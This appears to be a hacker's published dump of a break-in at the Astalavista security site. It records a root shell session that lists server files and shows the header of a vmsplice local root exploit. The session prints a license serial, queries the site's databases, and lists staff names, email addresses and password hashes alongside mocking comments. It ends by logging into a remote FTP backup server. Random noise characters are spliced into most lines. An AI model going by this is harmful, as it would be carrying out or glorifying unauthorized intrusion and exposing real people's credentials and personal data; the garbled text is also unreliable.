, I( t3 {$ p# Y; _total 1412089 \7 d1 b$ [+ M" [9 F
drwx–x–x 10 com com 4096 Apr 28 12:40 .
4 d* Y0 k6 O p( k% Hdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
( Q, b1 _) f- F1 P v/ N9 L3 C# mdrwx—— 2 com com 4096 Jun 4 04:04 backups8 w/ p- b3 A1 F$ l% W
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql( o2 A2 a( Q, H* ~% h# [
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system1 R5 f P# `1 T2 M8 {" ~
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
8 {( R9 V4 N# i-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
) {5 z: V9 j7 N! C8 W-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
s' G+ F, F+ l0 y-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
0 ?" o$ B+ |1 f/ ?drwx–x–x 3 com com 4096 Jan 29 2008 domains! o# x+ |: V( F
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed# n' s" |* q \+ t9 `/ z3 B+ J$ g; [
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap, K a( r: v R& A+ V
-rw——- 1 com com 69 Nov 18 2008 .lesshst) S# @5 x2 G/ W* a
drwx—— 2 com com 4096 Sep 24 2007 mail3 k0 q# l$ n! t
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history# z; x7 F2 F: c4 f+ D
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp+ [4 O% m' d0 I: v4 H8 _
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
/ b$ v; _ E Z) T5 ~* y) F5 s-rw-r—– 1 com mail 34 Sep 24 2007 .shadow9 @ \! ?& M1 O7 W. t! g4 c
drwx—— 2 com com 4096 Aug 26 2008 .ssh& J& s% y) Y" @8 K! F8 [* t, d5 j
-rwx—— 1 com com 8515 Feb 10 2008 t+ H. m& G Q4 l5 F) w
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c0 U% O( j5 O6 o/ R6 r7 \& H) q, W
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
) A: G: H2 W3 n1 O5 L-rw-rw-r– 1 com com 617 May 20 2008 .toprc' m; E3 [' I* A' Y+ x1 ]0 h5 j( y
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
5 X! J0 V1 l6 i/ h+ O( [9 W; Q-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
3 I7 i3 h* m( N9 R& Z* g-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
% O& Y, r6 G3 Q4 V4 r; O2 y
' p7 X3 G& _* N6 x) r7 Tsh-3.2# head t.c( t( ]: I. j* d: o
/*
; `$ [0 A" }. k# c1 b- w7 R8 \0 {* jessica_biel_naked_in_my_bed.c
4 X9 Y! p& s J$ f" ~*( ^0 } H; A) o6 p0 m1 p! P
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.4 \6 ^* f% U+ [$ n P
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca. _& M4 t0 O3 w# k# ]
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
: j8 a. \7 D, u6 Z1 N# T*% f2 }" t4 e, i$ e
* Linux vmsplice Local Root Exploit, `# N" V) S7 i
* By qaaz( j0 W! F( H! n) f# {) L
*
7 _: M5 V1 R6 ~- \! T) G# q7 M' V8 E5 u7 z! r+ \& I* C' J" z, K# k: d
sh-3.2# cd /; F4 f9 ?! {3 H: w
sh-3.2# ls -la' o9 h {. P+ w5 v" m" n
total 360
% @' F6 E, v* S/ t Z7 q3 qdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
: t+ ~8 ?$ i) M4 O- Z& Vdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .., G! [) |; N0 O% H; {0 O w* N3 V
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group ?/ s* ]/ z+ K
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
( A8 f5 g' A7 |4 |& d$ \-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
% p: n' E9 z4 Q% q-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck# X+ }- v7 L% U5 \
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
; G) G) H/ n& Rdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup
* d# V* Y3 r' Cdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
( W- _4 m! E( `4 k3 q# j8 [drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
+ z9 J! R E/ q) R! k. Idrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
f! ~: P8 @3 e& E( s( fdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
) |2 n8 I) [. t2 |+ ] kdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home6 y2 e% f% _& m, g" v8 V: B+ |
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
0 s. d; Z1 M0 {+ H2 Hdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
% m% ]/ \" d* e' B& o* f" G( \drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
- u: }; o$ j- C( V7 h$ x+ {% S# z/ vdrwx—— 2 root root 16384 Sep 11 2007 lost+found
Y( E& i) I- `/ zdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media7 a$ }# e$ V, ?9 }3 M2 f! A
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc4 T; p y, }/ |* b9 u4 D
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt/ a7 c( u. F+ U: l0 l6 R
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg+ n6 `- A& Z. L( z$ z* L( x
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
3 \0 p( \+ y2 A& a- Adrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
% H, z- w9 r7 P; y+ cdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc7 V; ^8 j* ~4 C/ g
drwxr-x— 15 root root 4096 Jun 4 08:40 root( z9 _, s! ^0 f. Z; R) h! L$ o
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin* M( G: p, ]9 H: n3 I
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux) A2 b& ^% F. k/ O& o
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
- r; Y% M& J/ C- z9 X, `6 Fdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys% W0 G9 S; O7 W F; e. V
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp" S4 x' p! \: W' A! @( V
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
* j; H4 V# b' Tdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var& _2 Q8 Z) t) \1 T+ {) D
& r+ z9 o g& c) }
sh-3.2# cd opt
6 }! w- W% [$ q3 I% g% z; p( }sh-3.2# ls -la
* v2 E+ J) X; K7 jtotal 20* x, n' r. p: y/ j( ]# {
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .! _! l2 \- l2 ~8 R. K
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
6 |8 d; ?# g+ U0 [! ^! t# p% _drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws6 z$ n( n* S2 T! a# F
' G1 D( K8 H: ~2 r5 ^& t$ f" f- Vsh-3.2# cd lsws/; T% `' {! V( J# X# S* m, }
sh-3.2# ls -la( y% _' R4 ~$ F3 T4 K/ |
total 108- h$ }$ n; Z% A- h
drwxr-xr-x 15 root root 4096 Mar 20 2008 .' M5 a# s" P1 v" U0 \1 r4 Q& {( D1 k
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..+ Q4 n6 `3 Q% Y5 s& |' \
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons) t0 {# W7 B/ s2 A
drwxr-xr-x 13 root root 4096 May 29 15:10 admin+ V0 Y% N: `* R: B/ R7 o0 _8 Z7 b9 @: J
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
" W+ o3 c8 i$ O* X' I# ^drwxr-xr-x 2 root root 4096 May 29 15:10 bin
( n7 a F- d" X. V' edrwx—— 4 apache apache 4096 Jun 3 02:43 conf
2 p' V6 y, n. C. K2 kdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT* I( E" C: D+ t9 a7 Q" n
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs2 [1 m" P. u9 [: i, ?8 p% a# a
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
; t! {; c9 w$ o* G% E9 z# m Jdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
" Y, Z$ P- A% A- L-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE* k9 B% j- x* [: P8 {' i
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
7 C" W+ s0 l4 h3 J0 I( ^5 U-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
' [/ y3 H! x6 g* S3 `: c# H-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
! @- z) q& y+ _2 a" Rdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs" l- j1 S. ~2 m' C( D
drwxr-xr-x 2 root root 4096 Mar 20 2008 php# \ d. E$ C1 i
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
: c4 i' X7 e7 a2 adrwxr-xr-x 3 root root 4096 Mar 20 2008 share: u1 k6 l/ R, d2 ^ R: p9 ~4 E
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
2 L9 p. D* A/ [2 c
; @3 @% D2 b' q0 f" g& F7 l% psh-3.2# cd conf
* p" c" O! @5 H2 l. ^sh-3.2# ls -la
9 {. n% m R2 ~! j' N+ Dtotal 48
) }/ [# T) M# Y& u4 d: ndrwx—— 4 apache apache 4096 Jun 3 02:43 .& F/ n- v G* x3 x
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..: ? Y1 B/ ~# v
drwx—— 2 apache apache 4096 Mar 20 2008 cert8 [8 ~8 w' ^4 o$ T3 q1 ]
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
9 L4 \2 I9 W$ v( M. p. P, F0 X3 ~-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
8 q" s# A) [1 J-rw-r–r– 1 root apache 0 Jun 3 14:11 .last$ c3 {6 d% D5 E, J; I* z
-rw——- 1 apache apache 256 May 29 15:10 license.key+ m4 G# j$ ~8 l) C& m `7 N! `
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old( E" {) B8 P3 X* U
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
8 `, d G% T# U9 k. }8 y8 g( ]-rw——- 1 apache apache 20 May 29 15:10 serial.no+ @4 Z; I5 D- H2 O5 S9 a$ a0 u
drwx—— 2 apache apache 4096 Mar 20 2008 templates
3 f- H9 I7 ^% B1 p- l" |' u$ l
3 A; D& p+ W# p$ C$ Dsh-3.2# cat serial.no: {" ?1 s1 H& v4 T% ?
IbDl-oVsO-CKqL-wVRa
3 V( y8 t/ o6 p' X
L; ~4 E# b$ }# Csh-3.2# mysql# y: m: u q& d
Welcome to the MySQL monitor. Commands end with ; or \g.: V# r! h, r. v* P$ y! i5 f
Your MySQL connection id is 286844. X5 z; W) p8 [# u9 s& X
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
& f& @" a# c0 V. ?2 @, B' i% W2 V+ I2 K& G
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.! s6 m7 I* q0 ~$ Q) P; o0 B, M
! m6 k) B1 G3 z% _/ B' X: zmysql> show databases;
8 u3 j% V1 |: [) w& V5 x4 F+———————–++ v4 l; z; Y7 M: D# O2 ^
| Database |
& q4 P. S2 ~) X/ v# D5 L+———————–+
7 W, N, e. Y% t/ u3 N) P6 x| information_schema |+ }9 B8 ?* j; ]9 @' h) g
| astanet_ads |
6 b& R7 R& M8 C$ l4 {| astanet_mailing_lists |% V* e$ W: ]' x( a" q
| astanet_mediawiki |
& u+ m& Q( R( U* M+ P: y2 ]/ O& O| astanet_membersystem |
0 u$ j. X# _; r" ^9 D( W| com_contrexx |' d2 Q# @' w' F9 u3 U+ j. k
| com_contrexx2 |
5 O7 z+ P$ G5 _7 o2 M! _, o/ y| com_contrexx2_live |/ i' j% ^; t# l* {0 R
| da_roundcube |
6 X& [3 o3 I" Z, V$ y9 B| dolphin |
6 G+ |6 n; i S% {& l$ d| ideapool |( B' I& o/ J7 p4 r
| mysql |, P- f( x" ^: f! U1 ^* R
| test |
! b4 {" r, k: [1 O( _# e6 n8 d# w| yourmaster |" E. V% F) Y+ q& R. J! z
+———————–+
/ R1 l7 R- d1 c# ^4 ~5 X- f1 G8 a& ?14 rows in set (0.00 sec)7 y( Z# {7 P+ v6 B6 I
2 Q' G! u0 B5 E5 B. Pmysql> use ideapool& F# H! t! Z) A8 D
Database changed x3 A$ t( o" k9 }% n
mysql> show tables;" d' y% J6 t- R& n9 p G2 `2 b1 ^
+———————————–+* _0 x3 A- W4 g7 L/ s
| Tables_in_ideapool |
/ B" U1 z! \/ g) g F! y+———————————–+
4 x& P0 O" r: u! Q| eventum_columns_to_display |+ O- Y: N! w" D5 Z( ?0 p
| eventum_custom_field |
5 n( e. L, c O2 [! l4 i3 K| eventum_custom_field_option |2 U/ m; U! _6 \$ C
| eventum_custom_filter |# ?. C. y- I8 r5 {& ^- C1 i
| eventum_customer_account_manager |
; r! g) I. j U1 _7 m| eventum_customer_note |( z1 c% T6 @; _
| eventum_email_account |# B; @% v+ d; H8 O0 ?; t" Y8 g; f, Z
| eventum_email_draft |' C4 [% @+ y. U/ k6 V# l
| eventum_email_draft_recipient |
, f+ Z$ B L) ~7 |: w5 `. ~| eventum_email_response |# P' b: `( D$ K& d$ n3 C" ?3 V3 F
| eventum_faq |) J: d5 ^( d0 i# M: |- ]$ m
| eventum_faq_support_level |) R3 v0 G$ ^- f
| eventum_group |
; s5 j. T9 [. Y( \| eventum_history_type |
7 n2 G+ F7 U. Z e- z0 q| eventum_irc_notice |# S! Q9 U* F0 }
| eventum_issue |
' z5 o5 N! [0 V" ~2 |& h) f/ v| eventum_issue_association |( ~( ?7 z! Z* g4 Y1 Z, @ D
| eventum_issue_attachment |
4 {" p1 d; l5 O9 `| eventum_issue_attachment_file |
# ]0 n' d* Q$ N+ Z5 M6 a! d8 A. s+ N: a| eventum_issue_checkin |
1 D! Z3 B. c8 w. O g0 ]& x| eventum_issue_custom_field |; M0 f+ J+ ^ ~8 G) V
| eventum_issue_history |
: W) ]* E8 T3 N6 `. Q| eventum_issue_quarantine |
! x/ N H9 X' X4 h! E7 h| eventum_issue_requirement |
. g" B, \1 \) `: N1 a# h- @. Q2 B| eventum_issue_user |/ J* P6 g% B6 {" [8 y" d
| eventum_issue_user_replier |
5 U( @5 D' z/ Y; t$ }4 W9 {| eventum_link_filter |
, d l; Z# a8 ]6 _) u$ A( x- e| eventum_mail_queue |4 m: |% t. E& }4 L7 c/ \. l
| eventum_mail_queue_log |9 `$ E" L6 A Z1 D) s6 U) ~
| eventum_news |
6 w! Z' Y$ ^8 c! v+ h| eventum_note |' M! U/ r g- ?! o) `1 n" p0 ^
| eventum_phone_support |
( P# q1 u6 }9 o1 l0 T| eventum_project |- q# T5 n4 l9 W3 c
| eventum_project_category |2 u0 n$ F9 |" x& O0 A, ~4 Y
| eventum_project_custom_field |
: C+ e' a2 u9 @, p9 g# P| eventum_project_email_response |
! ^+ w4 n4 e1 U( F1 j; }, V( I1 a" B| eventum_project_field_display |
3 m3 x6 U' g4 ]& e1 n# D| eventum_project_group |
# _# f/ e+ [) r# T| eventum_project_link_filter |% b+ a O' r; \* {" b9 b
| eventum_project_news |
, g* @) L' F3 Z H( }- h| eventum_project_phone_category |
3 G7 W0 O3 j! {1 x/ u: T6 b7 d| eventum_project_priority |: |* b& k6 K5 U- j' g1 F
| eventum_project_release |1 W) @* m6 Z/ [/ Z
| eventum_project_round_robin |
9 ~/ G, L: [7 W3 @# m| eventum_project_status |
3 n! z$ \9 J* q| eventum_project_status_date |5 Y+ p8 ~+ y( J3 d- c+ _4 `; [
| eventum_project_user |
2 C* q6 z9 C# C* w% E| eventum_reminder_action |5 @1 p9 l |" |: a: L
| eventum_reminder_action_list |
( _4 C4 H9 ?9 B0 [' l4 P0 Y: e| eventum_reminder_action_type |$ Y: `9 v: ^3 e/ y K! y
| eventum_reminder_field |
7 k7 e1 ^: E% e2 X7 l5 ?% Z| eventum_reminder_history |
+ F# y& A/ I0 S/ R" d: L0 r6 p| eventum_reminder_level |
# x4 L. N7 ` Q0 l( R| eventum_reminder_level_condition |9 @1 v* Y8 g$ H
| eventum_reminder_operator |9 S; d$ G0 `5 T) R
| eventum_reminder_priority |1 Y6 ^* z2 g4 K5 e( q( u) V O
| eventum_reminder_requirement |
* n) R) S& D4 D| eventum_reminder_triggered_action |* P) C$ H5 M% r$ r, q
| eventum_resolution |
6 O4 k: M# e/ || eventum_round_robin_user |
3 I8 R. ]. A0 s& T2 R `| eventum_search_profile |, t: `9 K0 C0 q- N) R
| eventum_status |& ^* y- i. f" z; D: Q# t. h! X
| eventum_subscription |
/ s5 ~# x. {' f1 t, u| eventum_subscription_type |
0 n2 V+ c, |2 z9 e! V6 s| eventum_support_email |
$ V4 X8 ^# S" T% R$ W' V @6 ?; d" O| eventum_support_email_body |1 @" z" s' d. k1 j$ E7 h5 h/ @
| eventum_time_tracking |2 {$ x; Q9 H6 `# C
| eventum_time_tracking_category |
3 X( b8 \" S. j| eventum_user |
' w- C' K% ~- l, K+———————————–+
/ k' e. E+ x3 ?4 Z* H69 rows in set (0.00 sec)! @& J& T6 m& h, |
- ], Q1 D0 }- D" W& \4 g
mysql> describe eventum_user;
$ X2 `+ o7 G0 J. W+————————-+——————+——+—–+———————+—————-+ q( b* E: G9 P1 N0 J/ E
| Field | Type | Null | Key | Default | Extra |+ _& c+ C2 C8 W7 L. d# @
+————————-+——————+——+—–+———————+—————-++ V9 Q6 U& z% A3 a
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |! T- }; {" [9 V. @" n2 P
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |& v$ t$ m& R: d# X
| usr_customer_id | int(11) unsigned | YES | | NULL | |8 D; P: Y3 {/ w/ q4 P( B& g
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
0 w B5 S0 b9 c4 Z5 [5 c+ @| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
2 D8 n/ ?8 v! H: T: U) }| usr_status | varchar(8) | NO | | active | |! |/ a8 F/ n6 m6 h3 y3 S
| usr_password | varchar(32) | NO | | | |, C& o9 c* f8 a2 W" |" D& }
| usr_full_name | varchar(255) | NO | | | | ]5 S( n1 P. I$ U; e$ ]
| usr_email | varchar(255) | NO | UNI | | |
/ T- i2 D7 S9 A. B, e: B! G7 }| usr_preferences | longtext | YES | | NULL | |
4 A4 R" y) r3 s| usr_sms_email | varchar(255) | YES | | NULL | |$ Y8 C' `% ~0 M- ]
| usr_clocked_in | tinyint(1) | YES | | 0 | |
3 q2 l: i7 N. {3 H Y- }* c$ X| usr_lang | varchar(5) | YES | | NULL | |
" R T X7 N' U u0 P' c+————————-+——————+——+—–+———————+—————-+" p9 H; ]' T/ W) ~8 n9 C
13 rows in set (0.00 sec)
: e$ s' t& L1 B; K. ?
# ]8 W% f7 `: j# t7 M2 U( m' I1 M& Gmysql> select usr_full_name,usr_email,usr_password from eventum_user;( Z P9 ]; v# R! p1 x
+———————-+——————————-+———————————-+
0 W0 U0 R2 D- f. V7 W| usr_full_name | usr_email | usr_password |% d: w: l8 h O9 y
+———————-+——————————-+———————————-+3 ~+ E4 E/ P, j k" }& P* D
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
}- F2 A0 V( x/ t1 Y" O, d| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
- b3 Y6 ]. w4 I1 h6 a% E| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |* O% G& l, K9 ]/ l7 D
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
4 p% d- V- M$ B+ m ?& c1 a| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
- b5 ^& P# L2 Y0 z e/ z. f4 n| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |* M1 O2 W( S' n/ e. U8 u5 J- I! W7 t
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
/ R7 O9 u! w& }# y+ `4 V| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |9 `$ Y5 G& K8 r6 m* e
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
7 G* R; _8 n9 N! f7 B: I| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
, g O1 W! F+ Y7 `. d3 L| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |! D2 N' G% B" x) B
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
2 J+ U" i5 ?8 d| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |& o% X7 ~- Y0 [0 m. G% Y
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |: D/ Z% J7 p/ G+ k6 e/ _( \. u2 s
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
1 y( M' O. U/ K; J! t6 p5 K+———————-+——————————-+———————————-+/ t2 m! \# ^% ~6 D7 u3 k8 o
15 rows in set (0.00 sec)
6 [5 b, q9 r/ D" s/ A' {& H2 V* p
mysql> select iss_description from eventum_issue where iss_id = 43;! {6 S- n8 G U/ l( ~' L' s
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
8 h! w$ s0 E7 G* f6 P. M| iss_description 4 g N% i2 T" k
|
/ u" ]& E: Z1 p+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
( i- u5 X2 y' i/ {& ?: y| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
6 ], _9 E |' e; S/ ^connected for 90 mins… 120mins… so what i propose is something like:
- s2 }; Z) j7 ~链接标记[url]http://www.surfthechannel.com/[/url], Z3 U, \( \' m
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
+ V! [: X+ H6 v+ ]/ t! jlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
9 n: Q. ` i4 O( [% s I$ e/ Xbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
' t7 t6 Q+ P, _ D: G& Vif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…& s3 x4 i8 [2 O
- Z: C- U, o0 n. B- T# f8 xWe could also put advertisement during play on the flash video player itself… extra $$…
* e* U9 j v% v! D0 J4 a9 [
( ~& x1 c* b: {, n& E7 MBy sykadul |
. D4 h$ h+ i f! z. y6 `# w( t+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
# p* }' b2 u5 o% h. _1 row in set (0.00 sec)
7 Y, M# m4 r* D7 K
& @2 \- f' z3 E// Money and extra $$ is all they care about. remember that.
) C v- E! W9 }4 P
! b+ e- v4 W( Z, O: \; J4 Jmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;; y( g% d6 ]# F( K- G7 l$ |
+————————+——————————————————————————————————————————————————————————————————————————————-+% S, _1 ]" B! Y, s3 c' d
| iss_summary | iss_description + r* c" \0 I; z1 v! J/ z
|8 z: s4 M* o1 O- X S9 c; p( V
+————————+——————————————————————————————————————————————————————————————————————————————-+
$ L( @2 Z8 l& n# j8 n0 ]& a8 S| Forum for REAL EXPERTS | Hello,
; c5 @: s* g9 I) W2 a- @
) r6 x0 m4 y0 v% RIshtus and I,
2 m4 \+ t; |0 ^( V; c% J3 L, ~! ~" d6 B) ?( G: W( m$ r* [
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide r. A& Q/ ?& C! V
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
1 a! M# Q% } \% _' N5 n9 s2 i& ^$ w/ w# t! s; H; w5 A
One example a friend of mine from coresecurity.com!: e$ N( X w* X! R. [. h' u
# J; l. @; O; e% ~
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..8 B0 H; T; u7 c, D0 g5 z! o, ^; l! t
2 Z" k/ r6 o: h8 q9 L' n6 \5 X
|
* d+ S. o. Z4 r' C5 v7 F- q- t) {+————————+——————————————————————————————————————————————————————————————————————————————+: R3 w& [3 }1 k% X3 E+ ~. }
1 row in set (0.00 sec)/ ~; w* n* H2 k ^' X/ S6 d+ `4 y
4 S: A" g3 e `" K8 i3 h* t
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
" c7 G0 j: r' n6 F3 p! J2 a6 g3 {/ B* ^6 F
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
/ [9 p5 v, S. Q( b% F3 I+——————+———————————————————————————————+
+ w) K2 ^. `* D9 k4 Z1 z| iss_summary | iss_description |) }/ Q% x/ k* \
+——————+———————————————————————————————+/ { r) N- b+ }- b
| Website guidance | Virtual Girl which guides you trought the website.- r/ j4 }, D) t3 X2 A9 n# M" {
4 {" A/ s* ~) r- C) m8 ~' W5 hWe need a girl with who you can ( talk )!!!% J/ E- L C5 l5 A
Also for the News!% L4 z' l9 I1 R- ?7 _+ a
So my suggestion is a girl who read you the news loud if you like!/ W; ?: E& ]5 p% o
you can choose between read yourselfe or she read it for you or both!
2 L, t* l# I, y6 b* g6 z$ g( J6 ]' i! z
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!" Y$ Y2 Z0 H) U% O
% |. M1 l, S% F& k3 k6 x
Have a look on the example girls!!
, B: w$ T7 @5 k2 n
! `; X, A! H- L; I7 `/ p链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
) C" H7 Q# D. p
5 K- b6 c5 v7 `, ]4 E( \or that0 l6 b2 a# e# {5 z) J
& A( e0 c- D" @& n链接标记[url]http://www.yellostrom.de/[/url]
- P/ F% ^ R$ A7 u# e3 l
3 j/ T8 A5 b( u" p1 i$ L6 O2 o% D|! {3 Y" |- I7 ?7 C4 N9 D
+——————+———————————————————————————————+" q7 X4 a6 _3 d) p! T% K. B, ^
1 row in set (0.00 sec)- M9 I0 J! }: Y
; N& h1 b- {/ L* b b// ha ha.$ }5 }* O9 R' w, j/ J! d: ~
# m; `. @+ x/ y, b4 N6 d# e* l' ~' t
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;9 q3 }* _ o& T9 Y9 E3 O
+————————–+———————————————————————————————————–+% N; l2 {2 I( ?
| iss_summary | iss_description |
" ?# |8 x. ?' o* E4 Z1 i; h+————————–+———————————————————————————————————–+
* _; ~, e2 ]" z) k$ r. S: V6 X| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |: z' F& w" i3 N, J: z9 D
+————————–+———————————————————————————————————–+
0 ~$ R' e1 E9 A5 M4 ^9 j6 @1 row in set (0.00 sec)+ z8 u2 ~2 I a
. R+ _1 n% o3 n% }- V* }4 x0 a
// LOL.# y) i$ G( y* m V( T0 w4 u9 v
! b" B; d3 l {: V9 o5 q% imysql> exit! l ?) N0 |- i3 F
Bye& u3 {( ]: X- X6 T! T5 O* H
3 O2 M7 h% _2 A0 w1 rsh-3.2# ftp 212.254.194.163
/ Z+ B* b& f- qConnected to 212.254.194.163.
4 e/ G& u/ |# ~3 J U5 L220 BackupCOM_VW FTP server ready.
3 w. i* i" u/ }* v; A$ a+ Y6 F; @504 AUTH: security mechanism ‘GSSAPI’ not supported.# k8 H2 w/ e$ N6 E+ h4 @# i
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.& ?- F! `" m$ E& I/ B
KERBEROS_V4 rejected as an authentication type
& N, C8 P4 ]) QName (212.254.194.163:root): astalavista.com
( T: G$ a5 `6 O331 Password required for astalavista.com.
% @' J+ ]% L/ m" n* ^Password:; X' M4 g4 H9 g/ I; ~, c5 m- r
230 User astalavista.com logged in.( ]2 |- {2 c+ N7 _/ }& Q1 b
Remote system type is UNIX.
2 a0 U' D6 D( o3 zUsing binary mode to transfer files.
( ?3 O9 a; D0 q, ^ftp> ls -la6 [; h8 @. Y5 b
227 Entering Passive Mode (212,254,194,163,2,188)9 g) l% C0 S/ ?5 e; g2 u
150 Opening BINARY mode data connection for ‘file list’.
( E- i) |6 Y7 q, V u3 [4 H5 B7 ldr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com u3 P5 H# |: { N7 ~9 L
226 Transfer complete.
8 \% `- ?6 ?2 {' ]! t! [+ E- ?) pftp> cd astalavista.com, {$ b: k+ m' u5 e- H
250 CWD command successful.2 o9 z; o. C" X4 [7 {3 U
ftp> ls -la
